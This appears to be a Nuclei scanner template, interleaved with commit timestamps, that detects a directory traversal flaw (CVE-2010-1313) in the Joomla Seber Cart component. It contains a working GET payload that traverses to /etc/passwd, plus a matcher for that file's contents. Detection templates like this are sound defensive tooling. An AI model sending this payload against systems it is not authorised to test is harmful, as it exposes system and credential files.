2021-09-03 00:42:37 +00:00
id : CVE-2010-1313
2022-04-22 10:38:41 +00:00
2021-09-03 00:42:37 +00:00
info :
name : Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author : daffainfo
2023-07-11 19:49:27 +00:00
severity : medium
2022-02-15 06:09:56 +00:00
description : A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to the latest version to mitigate this vulnerability.
2021-09-03 00:42:37 +00:00
reference :
- https://www.exploit-db.com/exploits/12082
2023-03-02 22:00:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2010-1313
2022-07-01 10:17:46 +00:00
- http://www.exploit-db.com/exploits/12082
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-02-15 06:09:56 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
2023-07-11 19:49:27 +00:00
cvss-score : 4.3
2022-02-15 06:09:56 +00:00
cve-id : CVE-2010-1313
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.0045
2024-05-31 19:23:20 +00:00
epss-percentile : 0.75061
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : seber
product : com_sebercart
2023-12-05 09:50:33 +00:00
tags : cve,cve2010,joomla,lfi,edb,seber
2022-04-22 10:38:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-03 00:42:37 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
2023-07-11 19:49:27 +00:00
2021-09-03 00:42:37 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
2021-09-03 00:42:37 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 490a00463044022015eb2f0633d1f1761aea73ac49a32a8c5f3f8d52eecf57edb76e58079036a216022047fcebd5259f4ddad0914d300ae4a4c5a374c3268897da3a734c54f4d85e3af7:922c64590222798bb761d5b6d8e72950